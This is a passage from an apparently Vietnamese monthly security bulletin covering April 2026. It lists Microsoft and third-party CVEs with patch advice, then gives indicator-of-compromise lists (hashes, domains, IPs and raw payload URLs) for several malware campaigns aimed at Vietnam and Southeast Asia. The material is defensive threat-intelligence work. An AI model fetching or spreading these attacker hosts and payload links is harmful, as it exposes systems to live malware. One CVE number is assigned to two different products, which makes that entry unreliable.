  • Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống

3. LỖ HỔNG BẢO MẬT

3.1. Microsoft Patch Tuesday – April 2026

Trong tháng 04, Microsoft đã phát hành 163 lỗ hổng bảo mật CVE mới trong Windows và các thành phần của Windows, Azure, .NET và Visual Studio, SQL Server, Hyper-V Server, BitLocker, và Windows Wallet Service. Trong đó có 8 lỗ hổng được đánh giá mức độ Critical, 2 lỗ hổng được đánh giá là Moderate, 153 lỗ hổng được đánh giá là Important.

Các lỗ hổng nổi bật ghi nhận trong tháng:

STT Mã CVE Tên lỗ hổng Thông tin chung Mức độ cảnh báo
       1 CVE-2026-32201 Microsoft SharePoint Server Spoofing Vulnerability Tồn tại lỗ hổng do xác thực đầu vào không đúng cách trong Microsoft Office SharePoint cho phép kẻ tấn công thực hiện hành vi Spoofing qua mạng. Important
       2 CVE-2026-33825 Microsoft Defender Elevation of Privilege Vulnerability Tồn tại lỗ hổng do kiểm soát truy cập thiếu chi tiết trong Microsoft Defender cho phép kẻ tấn công được ủy quyền nâng cao đặc quyền trên hệ thống cục bộ. Important
       3 CVE-2026-33827 Windows TCP/IP Remote Code Execution Vulnerability Tồn tại lỗ hổng “race condition” trong Windows TCP/IP cho phép kẻ tấn công trái phép thực thi mã từ xa trên hệ thống bị ảnh hưởng. Critical
       4 CVE-2026-33824 Windows Internet Key Exchange (IKE) Service Extensions Remote Code Execution Vulnerability Tồn tại lỗ hổng do lỗi “double free” trong Windows IKE Extension cho phép kẻ tấn công thực thi mã từ xa qua mạng trên hệ thống bị ảnh hưởng. Critical

Khuyến nghị:

  • Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống.

3.2. Ứng Dụng Web Và Các Sản Phẩm Khác

STT Mã CVE Tên lỗ hổng Thông tin chung Sản phẩm Mức độ cảnh báo
       1 CVE-2026-34197 Authenticated users could perform RCE via Jolokia MBeans Tồn tại lỗ hổng Code injection do xác thực đầu vào không đúng cách trong Apache ActiveMQ cho phép kẻ tấn công đã xác thực có thể lợi dụng Jolokia JMX-HTTP bridge bị lộ tại /api/jolokia/ để tải cấu hình Spring XML từ xa, dẫn đến thực thi mã tùy ý trên hệ thống bị ảnh hưởng. Apache ActiveMQ Important
       2 CVE-2026-40175 Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain Tồn tại lỗ hổng liên quan đến chuỗi tấn công Gadget cho phép kẻ tấn công khai thác lỗi Prototype Pollution trong các thư viện phụ thuộc bên thứ ba, dẫn đến thực thi mã từ xa và hoặc chiếm quyền kiểm soát toàn bộ hạ tầng đám mây trên hệ thống bị ảnh hưởng. Axios Critical
       3 CVE-2026-20180 & CVE-2026-20186 Cisco Identity Services Engine Remote Code Execution Vulnerabilities Tồn tại lỗ hổng do xác thực đầu vào người dùng cung cấp không đầy đủ, kẻ tấn công từ xa, đã được xác thực với quyền Read Only Admin, có thể thực thi mã tùy ý thông qua gửi một yêu cầu HTTP được tạo đặc biệt đến thiết bị bị ảnh hưởng. Cisco Identity Services Engine Software Critical
       4 CVE-2026-20147 Cisco Identity Services Engine Remote Code Execution Vulnerability Tồn tại lỗ hổng do xác thực đầu vào người dùng cung cấp không đầy đủ, kẻ tấn công từ xa, đã được xác thực với thông tin quản trị hợp lệ, có thể thực thi các câu lệnh tùy ý bằng cách gửi yêu cầu HTTP được tạo đặc biệt đến thiết bị bị ảnh hưởng. Cisco Identity Services Engine Software & Cisco ISE Passive Identity Connector Critical
       5 CVE-2026-20184 Cisco Webex Meetings Certificate Validation Vulnerability Tồn tại lỗ hổng do xác thực chứng chỉ không đúng cách trong Cisco Webex Services cho phép kẻ tấn công từ xa, chưa được xác thực, có thể giả mạo bất kỳ người dùng nào trong dịch vụ, dẫn đến truy cập trái phép vào các dịch vụ Cisco Webex hợp lệ. Cisco Webex Meetings Critical
       6 CVE-2026-35616 FortiClient EMS Improper Access Control Vulnerability Tồn tại lỗ hổng kiểm soát truy cập không đúng cách trong FortiClient EMS, cho phép kẻ tấn công không cần xác thực, thực thi mã hoặc lệnh trái phép thông qua các yêu cầu được tạo thủ công. FortiClient EMS Critical
       7 CVE-2026-27681 SQL Injection vulnerability in SAP Business Planning and Consolidation and SAP Business Warehouse Tồn tại lỗ hổng do thiếu kiểm tra phân quyền trong SAP Business Planning and Consolidation và SAP Business Planning Warehouse cho phép người dùng, đã được xác thực thực thi các câu lệnh SQL được tạo thủ công để đọc, sửa đổi và xóa dữ liệu trong cơ sở dữ liệu trên hệ thống bị ảnh hưởng. SAP Business Planning and Consolidation & SAP Business Warehouse Critical
       8 CVE-2026-33825 Missing Authorization check in SAP ERP and SAP S/4 HANA (Private Cloud and On-Premise) Tồn tại lỗ hổng do thiếu kiểm tra phân quyền trong SAP ERP và SAP S/4HANA (Private Cloud và On-Premises), kẻ tấn công đã xác thực có thể thực thi một particular ABAP report để ghi đè bất cứ report ABAP thực thi hiện có nào có tên tám ký tự mà không cần quyền, dẫn đến chức năng dự kiến có thể trở nên không khả dụng trên hệ thống bị ảnh hưởng. SAP ERP & SAP S/4 HANA (Private Cloud and On-Premise) High
       9 CVE-2026-33826 Windows Active Directory Remote Code Execution Vulnerability Tồn tại lỗ hổng do xác thực đầu vào không đúng cách trong Windows Active Directory cho phép kẻ tấn công từ xa, đã được cấp quyền hợp lệ, thực thi mã tùy ý trên hệ điều hành thông qua mạng. Windows Server Critical
   10 CVE-2026-40372 ASP.NET Core Elevation of Privilege Vulnerability Tồn tại lỗ hổng leo thang đặc quyền do xác minh chữ ký mật mã không đúng cách trong ASP.NET Core, cho phép kẻ tấn công trái phép leo thang đặc quyền trên mạng. ASP.NET Core Important

Khuyến nghị:

  • Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống

4. PHỤ LỤC

Danh sách các IoC liên quan đến các mã độc/ chiến dịch tấn công mới xuất hiện trong tháng 04/2026.

4.1. Danh sách IoCs liên quan đến các chiến dịch tấn công

4.1.1. Chiến dịch phát tán mã độc NotNullOSX Stealer nhắm mục tiêu vào khu vực Việt Nam

Indicators of Compromise

SHA-256

8d029b65c1076141d4817f25428cef44888b2fb4349ab9b9df7a413d240e1177

b0cd860f18b0136e063d7ef9a3c84d138a1a21dbea019605ce66a3a1fad91db4

ff7f0c39aa90ed8f4ce24658a347e7871bb5f6a607eaedf2cf2859a1fb5782a9

070402c2c531aa3a87b9ccd080532a51d17b01d982b205fc4487246d58de8913

b73adc5dc04159241e4a89cbc82eaa381f406080f3aaaa1f27d145900dd54267

82cb3a22c90aee6cfc2f7e7f72e921e21226492c1d424d2b754b9cd763ab0b20

47373950e1d23c066de0ed2d511b4b7eea56ec22d7b501db265995fec51dbb44

4584d02b5193799453766857dba97021f966b9cbf6033d7dd3a33d61eb975a6c

636fa90aebab98534dcdbe50508ed8d3607c284c72f831a4503e223540d3f761

Network indicators

mactest-6b2ab-default-rtdb[.]firebaseio[.]com

wallpapermacos[.]com

wallspaceapp[.]com

cdn[.]filestackcontent[.]com

83[.]217[.]209[.]88

111[.]90[.]149[.]111

4.1.2. Chiến dịch tấn công phát tán mã độc ClipBanker nhắm mục tiêu vào Việt Nam

Indicators of compromise

MD5

34a0f70ab100c47caaba7a5c85448e3d

7528bf597fd7764fcb7ec06512e073e0

8354223cd6198b05904337b5dff7772b

Network indicators

https[:]//pastebin[.]com/raw/FmpsDAtQ

https[:]//snippet[.]host/aaxniv/raw

https[:]//chiaselinks[.]com/raw/nkkywvmhux

https[:]//rlim[.]com/55Dfq32kaR/raw

https[:]//paste.kealper[.]com/raw/k3K5aPJQ

https[:]//git.parat[.]swiss/rogers7/dev-api/raw/master/cpzn

https[:]//pinhole[.]rootcode[.]ru/rogers7/dev-api/raw/master/cpzn

https[:]//GitHub[.]com/lukecodix/Proxifier/releases/download/4.12/Proxifier.zip

https[:]//gist.GitHub[.]com/msfcon5ol3/107484d66423cb601f418344cd648f12/raw/d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7/upxz

4.1.3. Chiến dịch tấn công phát tán mã độc NGate nhắm mục tiêu vào khu vực Việt Nam

Indicators of compromise

SHA-1

48A0DE6A43FC6E49318AD6873EA63FE325200DBC

A4F793539480677241EF312150E9C02E324C0AA2

94AF94CA818697E1D99123F69965B11EAD9F010C

Network Indicators

104[.]21[.]91[.]170

108[.]165[.]230[.]223

protecaocartao[.]online

4.1.4. Chiến dịch tấn công phát tán PXA Stealer tới từ tác nhân tại Việt Nam

Indicators of compromise

SHA-256

809560ff6a4c93d1ce9b026a406278bfbf2fee9c4af5d2a18c3e0a4e0cc6c096

bb980902e25dfca4333c196222378a07b128e2bd600976cff9356befd72eeb71

6802dbadc0f2444539bc148a4da3210442d9f72a0bf0e0e9b63ca2a52f77fd69

25392863a38a411d8cb9c0dbd4b35132be57e687e350ed051a465a443632f52b

a77f0e2d3e0523fb7ac29c653a7d11350a8e78cb515734740702042df12652fa

8c2cea43321dd6f1f0f8c8ffc4ec41c6fa6569b4a7803fa1410bf57caa21517d

d2011cbc82fd65d23628b8ff8b2fd91b3d75eb3c28dccb269d12babbf70069ee

7a2bcbd1902f7f74c9c043e55f42f2ada16e00828a558fb01c13dccd9c4e7997

653f1b0f2b4c711b46016c268fb985d82528bb4240e202be9640f31a0e6217b8

eee8da16f2276eaa4fdf4d35d323bcc156703ca5d5a80d6a5e30c10874589b04

3d1350fcf1dd81090925ce5c05c76a07ea5dfdc87dd47b19c026faa43f269818

406a6694eb5f377ad6be4750fc3cfde0528dd467274de21371fae01e9ada4562

135d90475895fe3b1fdd33ec471580449792a523b830e86ea4385cad697cd7d2

758e8d7b0e62c63b3f4d413a08a4c4f977b9d72d87ed600bf8933d80b730814d

04da925150e38fc5a08edb5127dddf69bf687c6a4f200f4bf80ae07a897ab307

203ed2104cff224d0d57f19093305b982cb313c90c78d99a1310c4212d5c193b

a0e4fe335cf9f6b2d8819944927535ddcfaca52cbe1fbc97f704e1456fe9b339

5b837a0c87b0352c1cc5887d8d76d92cd7285fe5b855452763776889b533e3c5

51f4c013283cf47810645df3716c5f7a3061cc2ded171d0ab82dbd990442583f

4a7ff5e4915ae3b713c1a16dff9263fa616378506067e4c222f46c28ae9deb50

412727f6fe6ea9df8b21ba8cf15d6f13dc42f48f34c1e0da4970f7c49fd35345

2af6f65872116a6bbd258ff24e04ab3d0695afb3fd3084ad3c070df766904a77

e864c0f1a2bb037a8cd9a9497af80d5b9d516627e593f9e40992f83e3a23956a

caeed0080f22e3a6dbbd6c329bf4a1050685d60074bc0b298e84aed37fe997ed

632d7159ae3595992031fd363f8e2f15f0f66a7f4a13fa1a33283f40575ca01f

8ba19fe8e7235c097241b843cfbad6868e8305cd378004f94b44819379bd992c

833a9fcc4fc6b7fe7b55b1ad15cb79526904fc61d794d12301a1ba73da1ca8d1

9f94b9a4e9b2ff0f0edf118fb28ea2d8c7cc1a7f695d8709d354aa9bbd79dadd

0187ec26abfbe7abf7f33d9b2eaa38ece74faa3b6ee333d1c42d083a42cfa700

2866ef1c14eb70063d165c658d4c69240788e2044bffa2336fb0138d015ddb58

6c76fb6628a9c6f9cb01a3795ea57f04f25a44dd190ea69a0684d14cdc6bbf48

257a09cdde82c8faf2e1ea5ea21c59efb91211d608db2b90bea5e46a1f660fad

0c5e23b8b991c4064d452e12b7662152a69ac953514df3f187dd568a9845dcc7

c4961b9c0accb64510c6a8b26ddf6ee5f7ef41fcc68da82c3e7dd06ceb07f12a

f1cd9c273b97402fe0207ecaa8c7afba7f9cb2c2cac0aec774209ecf1358ee0e

23b122deea347dbe2407c1542c1cc6caaafca537eb5d1950a4ed7c8a69395dbb

ab2cb803a2973ea1db618ccd75e335f5009626d6862e35b8fdd1f39ad2058ea7

c8217c0dab2d562989c43cd35a3eeb5a82b2810953e46f1b1fb6e8fb24732f22

9331c93d923d908a1aac3083cb15b6e09b8c24d48e4ad9e95d8b63412dece9a5

651a048f84d6f3a4e27182d1a5d2524218d994b491312930f5c705924994d44e

Network indicators

http://151.243.109.125/support/links/sunset[.]txt

195.24.236[.]116:8080/recover/links/sunset.txt

https://t[.]me/erik22sucbot

151.243.109[.]125

4.1.5. Chiến dịch tấn công nhắm mục tiêu vào các tổ chức chính phủ tại khu vực Đông Nam Á

Indicators of compromise

MD5

22e32bcf113326e366ac480b077067cf

9b435ad985b733b64a6d5f39080f4ae0

248a4d7d4c48478dcbeade8f7dba80b3

Network indicators

43.134.90[.]60

43.134.52[.]221

47.237.15[.]197

4.1.6. Chiến dịch tấn công phát tán mã độc RustDesk thông qua MSTeams giả mạo

Indicators of Compromise

SHA-256 SHA-1
d01148808fbeefa22cd4541cdaaee8bc1f74e3045302115dc5b08b99ff93dc9c 93aa31051cd1bac3bb2ffddb71f93330dcab9d89

Network indicators

systemautoupdater[.]com

mon[.]systemautoupdater[.]com

calipology[.]com

calipology[.]co[.]uk

13[.]248[.]243[.]5

76[.]223[.]105[.]230

23[.]27[.]141[.]44

4.1.7. Chiến dịch tấn công phát tán mã độc thông qua thư viện Axios bị xâm nhập

Indicators of Compromise

Network indicators

sfrclak[.]com

142[.]11[.]206[.]73

4.2. Danh sách IoCs liên quan đến mã độc

4.2.1. Chiến dịch phát tán mã độc Desck VB

Indicators of Compromise

MD5

138f29a9190acad9c392cc6fe37104b8.

f040a81be4d3b3584b79036d77794c16.

fd684ea48cb97714d4f8a0c741cf862b.

a624f6cb9ccd4106f91e58049163c757.

f17ed8c5c54bae6c74d0d793d7c7a72a.

SHA-256

220e11c678bcba151545ce19398e08b8802103bfbbc11696f3301ea8fa38190c.

Network Indicators

andrefelipedonascime1768785037020.1552093[.]meusitehostgator[.]com[.]br

hxxps[:]//Pastebin[.]com/JO5odWV/0

manikandan83[.]mysynology[.]net

45[.]156[.]87[.]226

4.2.2. Phân tích EDR Killer trong chiến dịch ransomware của Qilin

Indicators of Compromise

MD5:

89ee7235906f7d12737679860264feaf

6bc8e3505d9f51368ddf323acb6abc49

cf7cad39407d8cd93135be42b6bd258f

1305e8b0f9c459d5ed85e7e474fbebb1